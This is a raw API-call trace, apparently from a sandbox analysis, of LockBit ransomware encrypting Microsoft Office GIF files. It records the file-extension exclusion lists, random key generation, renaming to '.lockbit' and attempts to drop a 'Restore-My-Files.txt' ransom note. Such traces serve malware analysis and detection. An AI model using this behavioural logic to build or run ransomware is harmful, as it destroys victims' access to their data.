GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=442) returned 1 [0209.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0209.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0209.498] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.499] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.499] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.499] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.500] free (_Block=0x1fa2ed8) [0209.500] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.500] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.500] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e24d100, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4e24d100, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21303_.GIF", cAlternateFileName="")) returned 1 [0209.500] lstrcmpiW (lpString1=".", lpString2="BD21303_.GIF") returned -1 [0209.500] lstrcmpiW (lpString1="..", lpString2="BD21303_.GIF") returned -1 [0209.500] PathFindExtensionW (pszPath="BD21303_.GIF") returned=".GIF" [0209.500] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.500] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.500] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.500] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.500] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.500] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.501] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.501] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.501] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.501] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.505] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.505] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.505] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.505] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.505] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.505] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.506] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21303_.GIF") returned 1 [0209.506] lstrcmpiW (lpString1="ntldr", lpString2="BD21303_.GIF") returned 1 [0209.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21303_.GIF") returned 1 [0209.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21303_.GIF") returned 1 [0209.506] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21303_.GIF") returned -1 [0209.506] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21303_.GIF") returned 1 [0209.506] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21303_.GIF") returned 1 [0209.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF") returned=".GIF" [0209.506] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.506] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.506] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.507] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.507] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.507] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF.lockbit") returned 76 [0209.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21303_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0209.508] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.508] malloc (_Size=0x40068) returned 0x3f70048 [0209.509] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2820) returned 1 [0209.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0209.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0209.509] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0209.562] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.562] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.562] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.564] free (_Block=0x1fa2ed8) [0209.564] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21303_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.564] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.566] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0150b00, ftCreationTime.dwHighDateTime=0x1bd4f54, ftLastAccessTime.dwLowDateTime=0xbcd306c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf0150b00, ftLastWriteTime.dwHighDateTime=0x1bd4f54, nFileSizeHigh=0x0, nFileSizeLow=0x616, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21305_.GIF", cAlternateFileName="")) returned 1 [0209.566] lstrcmpiW (lpString1=".", lpString2="BD21305_.GIF") returned -1 [0209.566] lstrcmpiW (lpString1="..", lpString2="BD21305_.GIF") returned -1 [0209.566] PathFindExtensionW (pszPath="BD21305_.GIF") returned=".GIF" [0209.566] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.566] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.566] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.566] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.567] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.567] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.568] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.568] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.568] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21305_.GIF") returned 1 [0209.568] lstrcmpiW (lpString1="ntldr", lpString2="BD21305_.GIF") returned 1 [0209.568] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21305_.GIF") returned 1 [0209.568] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21305_.GIF") returned 1 [0209.568] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21305_.GIF") returned -1 [0209.568] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21305_.GIF") returned 1 [0209.568] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21305_.GIF") returned 1 [0209.569] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.569] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF") returned=".GIF" [0209.569] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.569] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.569] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.570] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.570] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.570] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.570] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.570] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF.lockbit") returned 76 [0209.570] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21305_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0209.571] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.571] malloc (_Size=0x40068) returned 0x3df0008 [0209.572] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1558) returned 1 [0209.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.572] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.573] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.640] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.640] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.640] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.642] free (_Block=0x1fa2ed8) [0209.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21305_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.642] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.642] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf17ca00, ftCreationTime.dwHighDateTime=0x1bd4f53, ftLastAccessTime.dwLowDateTime=0xbcd56820, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf17ca00, ftLastWriteTime.dwHighDateTime=0x1bd4f53, nFileSizeHigh=0x0, nFileSizeLow=0x328, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21307_.GIF", cAlternateFileName="")) returned 1 [0209.642] lstrcmpiW (lpString1=".", lpString2="BD21307_.GIF") returned -1 [0209.643] lstrcmpiW (lpString1="..", lpString2="BD21307_.GIF") returned -1 [0209.643] PathFindExtensionW (pszPath="BD21307_.GIF") returned=".GIF" [0209.643] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.643] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.643] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.644] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.644] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.644] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.644] 